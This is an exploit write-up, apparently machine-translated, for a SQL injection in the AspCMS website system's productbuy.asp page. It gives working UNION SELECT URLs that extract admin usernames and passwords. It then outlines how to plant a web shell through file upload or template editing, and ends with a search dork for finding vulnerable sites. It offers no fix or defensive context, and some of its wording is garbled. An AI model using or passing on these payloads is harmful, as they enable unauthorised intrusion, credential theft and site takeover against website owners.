0-day injection of aspcms website construction system

An open-source enterprise website construction system with a new kernel developed by aspcms is competent for multiple website construction requirements of enterprises, and supports template customization and extension plug-ins. It can complete enterprise website construction in a short time. Vulnerability file: plugproductbuy. asp does not filter the received parameter IDs, leading to webpage jumps after injection.

An open-source enterprise website construction system with a new kernel developed by aspcms, which is competent for multiple enterprise website construction requirements.

Supports customization of templates, extension plug-ins, and so on, allowing enterprises to build websites within a short period of time.

Vulnerability file:/plug/proDuCtbuy. asp

Receive ParametersIdInjection vulnerability caused by no filtering

The injected page is redirected, so it is fast. We recommend that you use the shortcut key to copy

Burst user name EXP:

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

This is the account name with an explosive ID = 1. If you find that you have insufficient permissions, try the following steps: 2, 3, 4 ...........
Password cracking

http://www.tmdsb.com/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

Background logon address:/admin/login. asp

Shell in the background

1. directly upload. asp; x

2. system configuration information

3. Create a template management. 1. Create an asp template and write the content of the Trojan.

Keywords: search keywords: intitle: PowerEdBy AspCms2